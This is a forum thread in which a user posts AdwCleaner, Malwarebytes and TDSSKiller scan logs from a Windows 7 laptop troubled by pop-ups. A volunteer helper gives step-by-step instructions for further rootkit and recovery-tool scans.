# AdwCleaner v3.211 - Report created 04/06/2014 at 08:58:10
# Updated 26/05/2014 by Xplode
# Operating System : Windows 7 Home Premium Service Pack 1 (64 bits)
# Username : Hewlett Packard - HEWLETTPACKARD
# Running from : C:\Users\Hewlett Packard\Desktop\AdwCleaner.exe
# Option : Scan

***** [ Services ] *****

***** [ Files / Folders ] *****

***** [ Shortcuts ] *****

***** [ Registry ] *****

Key Found : HKCU\Software\AppDataLow\Software
Key Found : HKLM\SOFTWARE\Classes\AppID\{4D076AB4-7562-427A-B5D2-BD96E19DEE56}
Key Found : HKLM\SOFTWARE\Classes\AppID\secman.DLL
Key Found : HKLM\SOFTWARE\Classes\CLSID\{66EEF543-A9AC-4A9D-AA3C-1ED148AC8EEE}
Key Found : HKLM\SOFTWARE\Classes\CLSID\{826D7151-8D99-434B-8540-082B8C2AE556}
Key Found : HKLM\SOFTWARE\Classes\Interface\{66EEF543-A9AC-4A9D-AA3C-1ED148AC8EEE}
Key Found : HKLM\SOFTWARE\Classes\Interface\{66EEF543-A9AC-4A9D-AA3C-1ED148AC8FFE}
Key Found : HKLM\SOFTWARE\Classes\secman.OutlookSecurityManager
Key Found : HKLM\SOFTWARE\Classes\secman.OutlookSecurityManager.1
Key Found : HKLM\SOFTWARE\Classes\TypeLib\{11549FE4-7C5A-4C17-9FC3-56FC5162A994}
Key Found : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{02478D38-C3F9-4EFB-9B51-7695ECA05670}
Key Found : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\PreApproved\{02478D38-C3F9-4EFB-9B51-7695ECA05670}
Key Found : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\PreApproved\{EF99BD32-C1FB-11D2-892F-0090271D4F88}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{66EEF543-A9AC-4A9D-AA3C-1ED148AC8EEE}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{66EEF543-A9AC-4A9D-AA3C-1ED148AC8FFE}

***** [ Browsers ] *****

-\\ Internet Explorer v11.0.9600.17041

-\\ Google Chrome v35.0.1916.114

[ File : C:\Users\Hewlett Packard\AppData\Local\Google\Chrome\User Data\Default\preferences ]

*************************

AdwCleaner[R0].txt - [8519 octets] - [25/05/2014 06:57:17]
AdwCleaner[R1].txt - [8579 octets] - [25/05/2014 07:10:27]
AdwCleaner[R2].txt - [1111 octets] - [25/05/2014 07:17:06]
AdwCleaner[R3].txt - [1171 octets] - [25/05/2014 07:21:58]
AdwCleaner[R4].txt - [2265 octets] - [27/05/2014 12:23:15]
AdwCleaner[R5].txt - [1266 octets] - [02/06/2014 08:18:52]
AdwCleaner[R6].txt - [2273 octets] - [04/06/2014 08:58:10]
AdwCleaner[S0].txt - [8155 octets] - [25/05/2014 07:10:54]
AdwCleaner[S1].txt - [2310 octets] - [27/05/2014 12:23:57]
AdwCleaner[S2].txt - [1329 octets] - [02/06/2014 08:19:23]

########## EOF - C:\AdwCleaner\AdwCleaner[R6].txt - [2513 octets] ##########


----------



## raphael100 (May 24, 2014)

# AdwCleaner v3.211 - Report created 04/06/2014 at 09:02:42
# Updated 26/05/2014 by Xplode
# Operating System : Windows 7 Home Premium Service Pack 1 (64 bits)
# Username : Hewlett Packard - HEWLETTPACKARD
# Running from : C:\Users\Hewlett Packard\Desktop\AdwCleaner.exe
# Option : Clean

***** [ Services ] *****

***** [ Files / Folders ] *****

***** [ Shortcuts ] *****

***** [ Registry ] *****

Key Deleted : HKLM\SOFTWARE\Classes\AppID\secman.DLL
Key Deleted : HKLM\SOFTWARE\Classes\secman.OutlookSecurityManager
Key Deleted : HKLM\SOFTWARE\Classes\secman.OutlookSecurityManager.1
Key Deleted : HKLM\SOFTWARE\Classes\AppID\{4D076AB4-7562-427A-B5D2-BD96E19DEE56}
Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{66EEF543-A9AC-4A9D-AA3C-1ED148AC8EEE}
Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{826D7151-8D99-434B-8540-082B8C2AE556}
Key Deleted : HKLM\SOFTWARE\Classes\Interface\{66EEF543-A9AC-4A9D-AA3C-1ED148AC8EEE}
Key Deleted : HKLM\SOFTWARE\Classes\Interface\{66EEF543-A9AC-4A9D-AA3C-1ED148AC8FFE}
Key Deleted : HKLM\SOFTWARE\Classes\TypeLib\{11549FE4-7C5A-4C17-9FC3-56FC5162A994}
Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{02478D38-C3F9-4EFB-9B51-7695ECA05670}
Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\PreApproved\{02478D38-C3F9-4EFB-9B51-7695ECA05670}
Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\PreApproved\{EF99BD32-C1FB-11D2-892F-0090271D4F88}
Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{66EEF543-A9AC-4A9D-AA3C-1ED148AC8EEE}
Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{66EEF543-A9AC-4A9D-AA3C-1ED148AC8FFE}
Key Deleted : HKCU\Software\AppDataLow\Software

***** [ Browsers ] *****

-\\ Internet Explorer v11.0.9600.17041

-\\ Google Chrome v35.0.1916.114

[ File : C:\Users\Hewlett Packard\AppData\Local\Google\Chrome\User Data\Default\preferences ]

*************************

AdwCleaner[R0].txt - [8519 octets] - [25/05/2014 06:57:17]
AdwCleaner[R1].txt - [8579 octets] - [25/05/2014 07:10:27]
AdwCleaner[R2].txt - [1111 octets] - [25/05/2014 07:17:06]
AdwCleaner[R3].txt - [1171 octets] - [25/05/2014 07:21:58]
AdwCleaner[R4].txt - [2265 octets] - [27/05/2014 12:23:15]
AdwCleaner[R5].txt - [1266 octets] - [02/06/2014 08:18:52]
AdwCleaner[R6].txt - [2601 octets] - [04/06/2014 08:58:10]
AdwCleaner[S0].txt - [8155 octets] - [25/05/2014 07:10:54]
AdwCleaner[S1].txt - [2310 octets] - [27/05/2014 12:23:57]
AdwCleaner[S2].txt - [1329 octets] - [02/06/2014 08:19:23]
AdwCleaner[S3].txt - [2544 octets] - [04/06/2014 09:02:42]

########## EOF - C:\AdwCleaner\AdwCleaner[S3].txt - [2604 octets] ##########


----------



## raphael100 (May 24, 2014)

I have scanned and cleaned - required re-boot. Posted the clean log above. The pop-ups are still present. I am updating and running Malwarebytes now.


----------



## emeraldnzl (Nov 3, 2007)

> I am updating and running Malwarebytes now.


Look forward to seeing what it finds.


----------



## raphael100 (May 24, 2014)

Malwarebytes Anti-Malware
www.malwarebytes.org

Scan Date: 6/4/2014
Scan Time: 9:11:42 AM
Logfile: Malwarebytes Log.txt
Administrator: Yes

Version: 2.00.2.1012
Malware Database: v2014.06.04.01
Rootkit Database: v2014.06.02.01
License: Free
Malware Protection: Disabled
Malicious Website Protection: Disabled
Self-protection: Disabled

OS: Windows 7 Service Pack 1
CPU: x64
File System: NTFS
User: Hewlett Packard

Scan Type: Threat Scan
Result: Completed
Objects Scanned: 316622
Time Elapsed: 7 min, 31 sec

Memory: Enabled
Startup: Enabled
Filesystem: Enabled
Archives: Enabled
Rootkits: Enabled
Heuristics: Enabled
PUP: Enabled
PUM: Enabled

Processes: 0
(No malicious items detected)

Modules: 0
(No malicious items detected)

Registry Keys: 0
(No malicious items detected)

Registry Values: 0
(No malicious items detected)

Registry Data: 0
(No malicious items detected)

Folders: 0
(No malicious items detected)

Files: 0
(No malicious items detected)

Physical Sectors: 0
(No malicious items detected)

(end)


----------



## raphael100 (May 24, 2014)

Unfortunately it did not catch anything. The 'reg2' pop-up opened up during the first part of the scan. The 'set-inf2' pop-up opened during the heuristic scan.


----------



## raphael100 (May 24, 2014)

Both pop-ups appear in my Windows Task Manager - image attached.


----------



## emeraldnzl (Nov 3, 2007)

Your pop image confirms the Japanese domain. What we want is to find what is triggering it.

The AdwCleaner re-run removed some bundled stuff from Yahoo again together with the messenger. I think you uninstalled that anyway.

I am pretty sure it isn't a rootkit but let's check to discount that possibility.

The next actions will generate quite long logs so you may have to use more than one post to get them in, that's fine.

*Now*

Please download the latest version of TDSSKiller from *here* and save it to your *Desktop*.

Doubleclick on *TDSSKiller.exe* to run the application, then click on *Change parameters.*










Put a checkmark beside *loaded modules*.










A reboot will be needed to apply the changes. Do it.
TDSSKiller will launch automatically after the reboot. Also your computer may seem very slow and unusable. This is normal. Give it enough time to load your background programs.
Then click on *Change parameters* in TDSSKiller.
Check all boxes then click OK.










Click the *Start Scan* button.










The scan should take no longer than 2 minutes.
If a *suspicious object* is detected, the default action will be *Skip*, click on *Continue*.










 If *malicious objects* are found, they will show in the Scan results - Select action for found objects and offer three options.
Ensure *Cure* (default) is selected, then click *Continue* > *Reboot now to finish the cleaning process.*










*Note*: If *Cure* is not available, please choose *Skip* instead, do not choose *Delete* unless instructed.

A report will be created in your root directory, (usually C:\ folder) in the form of "*TDSSKiller.[Version]_[Date]_[Time]_log.txt*". Please copy and paste the contents of that file here.
*After that*


Please run Farbars Recovery Scan Tool again
Press *Scan* button.
FRST will let you know when the scan is complete and has written the *FRST.txt* to file, close out this message, then type the following into the search box:

*mshta.exe*

Now press the *search* button
When the search is complete, search.txt will also be written to your USB
Type exit and reboot the computer normally
Please copy and paste both logs in your reply.(*FRST.txt* and *Search.txt*)
*So when you return please post
TDSSKiller log.txt
FRST.txt
Search.txt
*


----------



## raphael100 (May 24, 2014)

"When the search is complete, search.txt will also be written to your USB"

I need to insert a USB?


----------



## raphael100 (May 24, 2014)

12:01:31.0258 0x10f0 TDSS rootkit removing tool 3.0.0.37 May 30 2014 13:12:03
12:01:49.0265 0x10f0 ============================================================
12:01:49.0265 0x10f0 Current date / time: 2014/06/04 12:01:49.0265
12:01:49.0265 0x10f0 SystemInfo:
12:01:49.0265 0x10f0 
12:01:49.0265 0x10f0 OS Version: 6.1.7601 ServicePack: 1.0
12:01:49.0265 0x10f0 Product type: Workstation
12:01:49.0265 0x10f0 ComputerName: HEWLETTPACKARD
12:01:49.0265 0x10f0 UserName: Hewlett Packard
12:01:49.0265 0x10f0 Windows directory: C:\Windows
12:01:49.0265 0x10f0 System windows directory: C:\Windows
12:01:49.0265 0x10f0 Running under WOW64
12:01:49.0266 0x10f0 Processor architecture: Intel x64
12:01:49.0266 0x10f0 Number of processors: 4
12:01:49.0266 0x10f0 Page size: 0x1000
12:01:49.0266 0x10f0 Boot type: Normal boot
12:01:49.0266 0x10f0 ============================================================
12:01:49.0441 0x10f0 KLMD registered as C:\Windows\system32\drivers\77514097.sys
12:01:49.0649 0x10f0 System UUID: {9375880B-EE2B-9D66-20DA-E5253E13C31F}
12:01:50.0506 0x10f0 Drive \Device\Harddisk0\DR0 - Size: 0x1DCF856000 ( 119.24 Gb ), SectorSize: 0x200, Cylinders: 0x3CCE, SectorsPerTrack: 0x3F, TracksPerCylinder: 0xFF, Type 'K0', Flags 0x00000040
12:01:50.0512 0x10f0 ============================================================
12:01:50.0512 0x10f0 \Device\Harddisk0\DR0:
12:01:50.0513 0x10f0 MBR partitions:
12:01:50.0513 0x10f0 \Device\Harddisk0\DR0\Partition1: MBR, Type 0x7, StartLBA 0x800, BlocksNum 0x63800
12:01:50.0513 0x10f0 \Device\Harddisk0\DR0\Partition2: MBR, Type 0x7, StartLBA 0x64000, BlocksNum 0xC26C000
12:01:50.0513 0x10f0 \Device\Harddisk0\DR0\Partition3: MBR, Type 0x7, StartLBA 0xC2D0000, BlocksNum 0x2379000
12:01:50.0513 0x10f0 \Device\Harddisk0\DR0\Partition4: MBR, Type 0xB, StartLBA 0xE649800, BlocksNum 0x32800
12:01:50.0513 0x10f0 ============================================================
12:01:50.0515 0x10f0 C: <-> \Device\Harddisk0\DR0\Partition2
12:01:50.0516 0x10f0 D: <-> \Device\Harddisk0\DR0\Partition3
12:01:50.0516 0x10f0 ============================================================
12:01:50.0516 0x10f0 Initialize success
12:01:50.0516 0x10f0 ============================================================
12:02:24.0409 0x1934 KLMD registered as C:\Windows\system32\drivers\74130966.sys
12:02:24.0982 0x1934 Deinitialize success


----------



## raphael100 (May 24, 2014)

TDSS Produced 2 logs. The first posted above. The second below.


----------



## raphael100 (May 24, 2014)

12:01:31.0258 0x10f0 TDSS rootkit removing tool 3.0.0.37 May 30 2014 13:12:03
12:01:49.0265 0x10f0 ============================================================
12:01:49.0265 0x10f0 Current date / time: 2014/06/04 12:01:49.0265
12:01:49.0265 0x10f0 SystemInfo:
12:01:49.0265 0x10f0 
12:01:49.0265 0x10f0 OS Version: 6.1.7601 ServicePack: 1.0
12:01:49.0265 0x10f0 Product type: Workstation
12:01:49.0265 0x10f0 ComputerName: HEWLETTPACKARD
12:01:49.0265 0x10f0 UserName: Hewlett Packard
12:01:49.0265 0x10f0 Windows directory: C:\Windows
12:01:49.0265 0x10f0 System windows directory: C:\Windows
12:01:49.0265 0x10f0 Running under WOW64
12:01:49.0266 0x10f0 Processor architecture: Intel x64
12:01:49.0266 0x10f0 Number of processors: 4
12:01:49.0266 0x10f0 Page size: 0x1000
12:01:49.0266 0x10f0 Boot type: Normal boot
12:01:49.0266 0x10f0 ============================================================
12:01:49.0441 0x10f0 KLMD registered as C:\Windows\system32\drivers\77514097.sys
12:01:49.0649 0x10f0 System UUID: {9375880B-EE2B-9D66-20DA-E5253E13C31F}
12:01:50.0506 0x10f0 Drive \Device\Harddisk0\DR0 - Size: 0x1DCF856000 ( 119.24 Gb ), SectorSize: 0x200, Cylinders: 0x3CCE, SectorsPerTrack: 0x3F, TracksPerCylinder: 0xFF, Type 'K0', Flags 0x00000040
12:01:50.0512 0x10f0 ============================================================
12:01:50.0512 0x10f0 \Device\Harddisk0\DR0:
12:01:50.0513 0x10f0 MBR partitions:
12:01:50.0513 0x10f0 \Device\Harddisk0\DR0\Partition1: MBR, Type 0x7, StartLBA 0x800, BlocksNum 0x63800
12:01:50.0513 0x10f0 \Device\Harddisk0\DR0\Partition2: MBR, Type 0x7, StartLBA 0x64000, BlocksNum 0xC26C000
12:01:50.0513 0x10f0 \Device\Harddisk0\DR0\Partition3: MBR, Type 0x7, StartLBA 0xC2D0000, BlocksNum 0x2379000
12:01:50.0513 0x10f0 \Device\Harddisk0\DR0\Partition4: MBR, Type 0xB, StartLBA 0xE649800, BlocksNum 0x32800
12:01:50.0513 0x10f0 ============================================================
12:01:50.0515 0x10f0 C: <-> \Device\Harddisk0\DR0\Partition2
12:01:50.0516 0x10f0 D: <-> \Device\Harddisk0\DR0\Partition3
12:01:50.0516 0x10f0 ============================================================
12:01:50.0516 0x10f0 Initialize success
12:01:50.0516 0x10f0 ============================================================
12:02:24.0409 0x1934 KLMD registered as C:\Windows\system32\drivers\74130966.sys
12:02:24.0982 0x1934 Deinitialize success


----------



## raphael100 (May 24, 2014)

12:13:37.0828 0x1070 TDSS rootkit removing tool 3.0.0.37 May 30 2014 13:12:03
12:13:39.0572 0x1070 ============================================================
12:13:39.0572 0x1070 Current date / time: 2014/06/04 12:13:39.0572
12:13:39.0572 0x1070 SystemInfo:
12:13:39.0572 0x1070 
12:13:39.0572 0x1070 OS Version: 6.1.7601 ServicePack: 1.0
12:13:39.0572 0x1070 Product type: Workstation
12:13:39.0572 0x1070 ComputerName: HEWLETTPACKARD
12:13:39.0572 0x1070 UserName: Hewlett Packard
12:13:39.0572 0x1070 Windows directory: C:\Windows
12:13:39.0572 0x1070 System windows directory: C:\Windows
12:13:39.0572 0x1070 Running under WOW64
12:13:39.0572 0x1070 Processor architecture: Intel x64
12:13:39.0572 0x1070 Number of processors: 4
12:13:39.0572 0x1070 Page size: 0x1000
12:13:39.0572 0x1070 Boot type: Normal boot
12:13:39.0572 0x1070 ============================================================
12:13:39.0572 0x1070 BG loaded
12:13:39.0966 0x1070 System UUID: {9375880B-EE2B-9D66-20DA-E5253E13C31F}
12:13:41.0134 0x1070 Drive \Device\Harddisk0\DR0 - Size: 0x1DCF856000 ( 119.24 Gb ), SectorSize: 0x200, Cylinders: 0x3CCE, SectorsPerTrack: 0x3F, TracksPerCylinder: 0xFF, Type 'K0', Flags 0x00000040
12:13:41.0144 0x1070 ============================================================
12:13:41.0144 0x1070 \Device\Harddisk0\DR0:
12:13:41.0144 0x1070 MBR partitions:
12:13:41.0144 0x1070 \Device\Harddisk0\DR0\Partition1: MBR, Type 0x7, StartLBA 0x800, BlocksNum 0x63800
12:13:41.0144 0x1070 \Device\Harddisk0\DR0\Partition2: MBR, Type 0x7, StartLBA 0x64000, BlocksNum 0xC26C000
12:13:41.0144 0x1070 \Device\Harddisk0\DR0\Partition3: MBR, Type 0x7, StartLBA 0xC2D0000, BlocksNum 0x2379000
12:13:41.0144 0x1070 \Device\Harddisk0\DR0\Partition4: MBR, Type 0xB, StartLBA 0xE649800, BlocksNum 0x32800
12:13:41.0144 0x1070 ============================================================
12:13:41.0144 0x1070 C: <-> \Device\Harddisk0\DR0\Partition2
12:13:41.0144 0x1070 D: <-> \Device\Harddisk0\DR0\Partition3
12:13:41.0144 0x1070 ============================================================
12:13:41.0144 0x1070 Initialize success
12:13:41.0144 0x1070 ============================================================
12:16:40.0791 0x1aa8 ============================================================
12:16:40.0791 0x1aa8 Scan started
12:16:40.0791 0x1aa8 Mode: Manual; SigCheck; TDLFS; 
12:16:40.0791 0x1aa8 ============================================================
12:16:40.0791 0x1aa8 KSN ping started
12:16:44.0497 0x1aa8 KSN ping finished: true
12:16:44.0587 0x1aa8 ================ Scan system memory ========================
12:16:44.0587 0x1aa8 System memory - ok
12:16:44.0587 0x1aa8 ================ Scan services =============================
12:16:44.0621 0x1aa8 [ A87D604AEA360176311474C87A63BB88, B1507868C382CD5D2DBC0D62114FCFBF7A780904A2E3CA7C7C1DD0844ADA9A8F ] 1394ohci C:\Windows\system32\drivers\1394ohci.sys
12:16:44.0681 0x1aa8 1394ohci - ok
12:16:44.0703 0x1aa8 [ D81D9E70B8A6DD14D42D7B4EFA65D5F2, FDAAB7E23012B4D31537C5BDEF245BB0A12FA060A072C250E21C68E18B22E002 ] ACPI C:\Windows\system32\drivers\ACPI.sys
12:16:44.0724 0x1aa8 ACPI - ok
12:16:44.0729 0x1aa8 [ 99F8E788246D495CE3794D7E7821D2CA, F91615463270AD2601F882CAED43B88E7EDA115B9FD03FC56320E48119F15F76 ] AcpiPmi C:\Windows\system32\drivers\acpipmi.sys
12:16:44.0746 0x1aa8 AcpiPmi - ok
12:16:44.0753 0x1aa8 [ B362181ED3771DC03B4141927C80F801, 69514E5177A0AEA89C27C2234712F9F82E8D8F99E1FD4273898C9324C6FF7472 ] AdobeARMservice C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
12:16:44.0767 0x1aa8 AdobeARMservice - ok
12:16:44.0790 0x1aa8 [ 09E7C37DF4A911C8A9AA8BF88ACD10AA, E881E0BBDCED58F28E0BA8DC27372EDFFFF2C57EE31CD13A032FDC9F7C831B5A ] AdobeFlashPlayerUpdateSvc C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
12:16:44.0808 0x1aa8 AdobeFlashPlayerUpdateSvc - ok
12:16:44.0825 0x1aa8 [ 2F6B34B83843F0C5118B63AC634F5BF4, 43E3F5FBFB5D33981AC503DEE476868EC029815D459E7C36C4ABC2D2F75B5735 ] adp94xx C:\Windows\system32\drivers\adp94xx.sys
12:16:44.0851 0x1aa8 adp94xx - ok
12:16:44.0864 0x1aa8 [ 597F78224EE9224EA1A13D6350CED962, DA7FD99BE5E3B7B98605BF5C13BF3F1A286C0DE1240617570B46FE4605E59BDC ] adpahci C:\Windows\system32\drivers\adpahci.sys
12:16:44.0885 0x1aa8 adpahci - ok
12:16:44.0894 0x1aa8 [ E109549C90F62FB570B9540C4B148E54, E804563735153EA00A00641814244BC8A347B578E7D63A16F43FB17566EE5559 ] adpu320 C:\Windows\system32\drivers\adpu320.sys
12:16:44.0910 0x1aa8 adpu320 - ok
12:16:44.0918 0x1aa8 [ 4B78B431F225FD8624C5655CB1DE7B61, 198A5AF2125C7C41F531A652D200C083A55A97DC541E3C0B5B253C7329949156 ] AeLookupSvc C:\Windows\System32\aelupsvc.dll
12:16:44.0955 0x1aa8 AeLookupSvc - ok
12:16:44.0971 0x1aa8 [ 79059559E89D06E8B80CE2944BE20228, 6E041D2FED2D0C3D8E16E56CB61D3245F9144EA92F5BDC9A4AA30598D1C8E6EE ] AFD C:\Windows\system32\drivers\afd.sys
12:16:44.0999 0x1aa8 AFD - ok
12:16:45.0005 0x1aa8 [ 608C14DBA7299D8CB6ED035A68A15799, 45360F89640BF1127C82A32393BD76205E4FA067889C40C491602F370C09282A ] agp440 C:\Windows\system32\drivers\agp440.sys
12:16:45.0018 0x1aa8 agp440 - ok
12:16:45.0024 0x1aa8 [ 3290D6946B5E30E70414990574883DDB, 0E9294E1991572256B3CDA6B031DB9F39CA601385515EE59F1F601725B889663 ] ALG C:\Windows\System32\alg.exe
12:16:45.0043 0x1aa8 ALG - ok
12:16:45.0047 0x1aa8 [ 5812713A477A3AD7363C7438CA2EE038, A7316299470D2E57A11499C752A711BF4A71EB11C9CBA731ED0945FF6A966721 ] aliide C:\Windows\system32\drivers\aliide.sys
12:16:45.0059 0x1aa8 aliide - ok
12:16:45.0064 0x1aa8 [ 1FF8B4431C353CE385C875F194924C0C, 3EA3A7F426B0FFC2461EDF4FDB4B58ACC9D0730EDA5B728D1EA1346EA0A02720 ] amdide C:\Windows\system32\drivers\amdide.sys
12:16:45.0076 0x1aa8 amdide - ok
12:16:45.0081 0x1aa8 [ 7024F087CFF1833A806193EF9D22CDA9, E7F27E488C38338388103D3B7EEDD61D05E14FB140992AEE6F492FFC821BF529 ] AmdK8 C:\Windows\system32\drivers\amdk8.sys
12:16:45.0097 0x1aa8 AmdK8 - ok
12:16:45.0103 0x1aa8 [ 1E56388B3FE0D031C44144EB8C4D6217, E88CA76FD47BA0EB427D59CB9BE040DE133D89D4E62D03A8D622624531D27487 ] AmdPPM C:\Windows\system32\drivers\amdppm.sys
12:16:45.0119 0x1aa8 AmdPPM - ok
12:16:45.0126 0x1aa8 [ D4121AE6D0C0E7E13AA221AA57EF2D49, 626F43C099BD197BE56648C367B711143C2BCCE96496BBDEF19F391D52FA01D0 ] amdsata C:\Windows\system32\drivers\amdsata.sys
12:16:45.0140 0x1aa8 amdsata - ok
12:16:45.0151 0x1aa8 [ F67F933E79241ED32FF46A4F29B5120B, D6EF539058F159CC4DD14CA9B1FD924998FEAC9D325C823C7A2DD21FEF1DC1A8 ] amdsbs C:\Windows\system32\drivers\amdsbs.sys
12:16:45.0173 0x1aa8 amdsbs - ok
12:16:45.0178 0x1aa8 [ 540DAF1CEA6094886D72126FD7C33048, 296578572A93F5B74E1AD443E000B79DC99D1CBD25082E02704800F886A3065F ] amdxata C:\Windows\system32\drivers\amdxata.sys
12:16:45.0195 0x1aa8 amdxata - ok
12:16:45.0201 0x1aa8 [ 89A69C3F2F319B43379399547526D952, 8ABDB4B8E106F96EBBA0D4D04C4F432296516E107E7BA5644ED2E50CF9BB491A ] AppID C:\Windows\system32\drivers\appid.sys
12:16:45.0244 0x1aa8 AppID - ok
12:16:45.0249 0x1aa8 [ 0BC381A15355A3982216F7172F545DE1, C33AF13CB218F7BF52E967452573DF2ADD20A95C6BF99229794FEF07C4BBE725 ] AppIDSvc C:\Windows\System32\appidsvc.dll
12:16:45.0286 0x1aa8 AppIDSvc - ok
12:16:45.0291 0x1aa8 [ 9D2A2369AB4B08A4905FE72DB104498F, D6FA1705018BABABFA2362E05691A0D6408D14DE7B76129B16D0A1DAD6378E58 ] Appinfo C:\Windows\System32\appinfo.dll
12:16:45.0307 0x1aa8 Appinfo - ok
12:16:45.0315 0x1aa8 [ C484F8CEB1717C540242531DB7845C4E, C507CE26716EB923B864ED85E8FA0B24591E2784A2F4F0E78AEED7E9953311F6 ] arc C:\Windows\system32\drivers\arc.sys
12:16:45.0329 0x1aa8 arc - ok
12:16:45.0336 0x1aa8 [ 019AF6924AEFE7839F61C830227FE79C, 5926B9DDFC9198043CDD6EA0B384C83B001EC225A8125628C4A45A3E6C42C72A ] arcsas C:\Windows\system32\drivers\arcsas.sys
12:16:45.0350 0x1aa8 arcsas - ok


----------



## raphael100 (May 24, 2014)

12:16:45.0362 0x1aa8 [ 9A262EDD17F8473B91B333D6B031A901, 05DFBD3A7D83FDE1D062EA719ACA9EC48CB7FD42D17DDD88B82E5D25469ADD23 ] aspnet_state C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_state.exe
12:16:45.0379 0x1aa8 aspnet_state - ok
12:16:45.0383 0x1aa8 [ 769765CE2CC62867468CEA93969B2242, 0D8F19D49869DF93A3876B4C2E249D12E83F9CE11DAE8917D368E292043D4D26 ] AsyncMac C:\Windows\system32\DRIVERS\asyncmac.sys
12:16:45.0419 0x1aa8 AsyncMac - ok
12:16:45.0424 0x1aa8 [ 02062C0B390B7729EDC9E69C680A6F3C, 0261683C6DC2706DCE491A1CDC954AC9C9E649376EC30760BB4E225E18DC5273 ] atapi C:\Windows\system32\drivers\atapi.sys
12:16:45.0436 0x1aa8 atapi - ok
12:16:45.0459 0x1aa8 [ F23FEF6D569FCE88671949894A8BECF1, FCE7B156ED663471CF9A736915F00302E93B50FC647563D235313A37FCE8F0F6 ] AudioEndpointBuilder C:\Windows\System32\Audiosrv.dll
12:16:45.0514 0x1aa8 AudioEndpointBuilder - ok
12:16:45.0536 0x1aa8 [ F23FEF6D569FCE88671949894A8BECF1, FCE7B156ED663471CF9A736915F00302E93B50FC647563D235313A37FCE8F0F6 ] AudioSrv C:\Windows\System32\Audiosrv.dll
12:16:45.0594 0x1aa8 AudioSrv - ok
12:16:45.0602 0x1aa8 [ A6BF31A71B409DFA8CAC83159E1E2AFF, CBB83F73FFD3C3FB4F96605067739F8F7A4A40B2B05417FA49E575E95628753F ] AxInstSV C:\Windows\System32\AxInstSV.dll
12:16:45.0625 0x1aa8 AxInstSV - ok
12:16:45.0641 0x1aa8 [ 3E5B191307609F7514148C6832BB0842, DE011CB7AA4A2405FAF21575182E0793A1D83DFFC44E9A7864D59F3D51D8D580 ] b06bdrv C:\Windows\system32\drivers\bxvbda.sys
12:16:45.0670 0x1aa8 b06bdrv - ok
12:16:45.0682 0x1aa8 [ B5ACE6968304A3900EEB1EBFD9622DF2, 1DAA118D8CA3F97B34DF3D3CDA1C78EAB2ED225699FEABE89D331AE0CB7679FA ] b57nd60a C:\Windows\system32\DRIVERS\b57nd60a.sys
12:16:45.0704 0x1aa8 b57nd60a - ok
12:16:45.0713 0x1aa8 [ 09A19C806110CE839111850EC27E65F5, 828251F2183AA42F9556F820025A612CDC52E57424C10738F7A4640CAB7E06E7 ] bcbtums C:\Windows\system32\drivers\bcbtums.sys
12:16:45.0729 0x1aa8 bcbtums - ok
12:16:45.0855 0x1aa8 [ FBC76C8D561D0AD159EF9452D9F328F6, 3A1A3E8ED48316ACF833554C50CAA3278C980F139332E9F35D889F1C46532FAA ] BCM43XX C:\Windows\system32\DRIVERS\bcmwl664.sys
12:16:46.0000 0x1aa8 BCM43XX - ok
12:16:46.0014 0x1aa8 [ FDE360167101B4E45A96F939F388AEB0, 8D1457E866BBD645C4B9710DFBFF93405CC1193BF9AE42326F2382500B713B82 ] BDESVC C:\Windows\System32\bdesvc.dll
12:16:46.0031 0x1aa8 BDESVC - ok
12:16:46.0035 0x1aa8 [ 16A47CE2DECC9B099349A5F840654746, 77C008AEDB07FAC66413841D65C952DDB56FE7DCA5E9EF9C8F4130336B838024 ] Beep C:\Windows\system32\drivers\Beep.sys
12:16:46.0072 0x1aa8 Beep - ok
12:16:46.0095 0x1aa8 [ 82974D6A2FD19445CC5171FC378668A4, 075D25F47C0D2277E40AF8615571DAA5EB16B1824563632A9A7EC62505C29A4A ] BFE C:\Windows\System32\bfe.dll
12:16:46.0130 0x1aa8 BFE - ok
12:16:46.0174 0x1aa8 [ F10EFCE086C794F8A7C2C7A3EA52AC5F, 498C4A75DCC560CE1A6B7F671572A4CB2F4D5EA402E45399B7CF471CFBC48241 ] BHDrvx64 C:\Program Files (x86)\Norton Internet Security\NortonData\21.1.0.18\Definitions\BASHDefs\20140510.001\BHDrvx64.sys
12:16:46.0224 0x1aa8 BHDrvx64 - ok
12:16:46.0255 0x1aa8 [ 1EA7969E3271CBC59E1730697DC74682, D511A34D63A6E0E6E7D1879068E2CD3D87ABEAF4936B2EA8CDDAD9F79D60FA04 ] BITS C:\Windows\system32\qmgr.dll
12:16:46.0325 0x1aa8 BITS - ok
12:16:46.0331 0x1aa8 [ 61583EE3C3A17003C4ACD0475646B4D3, 17E4BECC309C450E7E44F59A9C0BBC24D21BDC66DFBA65B8F198A00BB47A9811 ] blbdrive C:\Windows\system32\drivers\blbdrive.sys
12:16:46.0345 0x1aa8 blbdrive - ok
12:16:46.0352 0x1aa8 [ 6C02A83164F5CC0A262F4199F0871CF5, AD4632A6A203CB40970D848315D8ADB9C898349E20D8DF4107C2AE2703A2CF28 ] bowser C:\Windows\system32\DRIVERS\bowser.sys
12:16:46.0367 0x1aa8 bowser - ok
12:16:46.0372 0x1aa8 [ F09EEE9EDC320B5E1501F749FDE686C8, 66691114C42E12F4CC6DC4078D4D2FA4029759ACDAF1B59D17383487180E84E3 ] BrFiltLo C:\Windows\system32\drivers\BrFiltLo.sys
12:16:46.0389 0x1aa8 BrFiltLo - ok
12:16:46.0393 0x1aa8 [ B114D3098E9BDB8BEA8B053685831BE6, 0ED23C1897F35FA00B9C2848DE4ED200E18688AA7825674888054BBC3A3EB92C ] BrFiltUp C:\Windows\system32\drivers\BrFiltUp.sys
